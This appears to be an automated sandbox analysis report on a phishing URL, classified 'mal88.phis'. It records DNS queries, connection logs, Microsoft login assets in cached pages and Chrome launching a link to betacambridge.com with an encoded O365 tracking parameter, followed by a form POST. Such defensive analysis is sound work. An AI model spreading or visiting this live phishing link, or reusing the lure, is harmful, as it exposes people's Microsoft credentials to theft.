          Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficDNS traffic detected: DNS query: betacambridge.com
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: cdn.socket.io
          Source: global trafficDNS traffic detected: DNS query: www.w3schools.com
          Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
          Source: global trafficDNS traffic detected: DNS query: www.betacambridge.com
          Source: unknownHTTP traffic detected: POST /n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123N HTTP/1.1Host: betacambridge.comConnection: keep-aliveContent-Length: 139036Cache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://betacambridge.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://betacambridge.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123NAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: chromecache_64.1.drString found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.
          Source: chromecache_64.1.drString found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3a
          Source: chromecache_59.1.drString found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e3281710
          Source: chromecache_59.1.drString found in binary or memory: https://aadcdn.msftauth.net/shared/1.0/content/images/appbackgrounds/49_6ffe0a92d779c878835b40171ffc
          Source: chromecache_59.1.drString found in binary or memory: https://cdn.socket.io/4.6.0/socket.io.min.js
          Source: chromecache_60.1.drString found in binary or memory: https://cdn.socket.io/4.7.5/socket.io.min.js
          Source: chromecache_59.1.drString found in binary or memory: https://google.com
          Source: chromecache_59.1.dr, chromecache_64.1.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.pn
          Source: chromecache_59.1.dr, chromecache_64.1.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.sv
          Source: chromecache_59.1.drString found in binary or memory: https://www.w3schools.com/w3css/4/w3.css
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
          Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
          Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
          Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
          Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
          Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
          Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
          Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
          Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
          Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
          Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
          Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
          Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
          Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
          Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
          Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
          Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
          Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
          Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
          Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
          Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
          Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
          Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
          Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
          Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
          Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
          Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
          Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
          Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
          Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
          Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
          Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
          Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49742 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49744 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49767 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49774 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49775 version: TLS 1.2
          Source: classification engineClassification label: mal88.phis.win@16/36@20/9
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1200 --field-trial-handle=2008,i,4224708502505659071,8326428056869441000,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://betacambridge.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123N"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
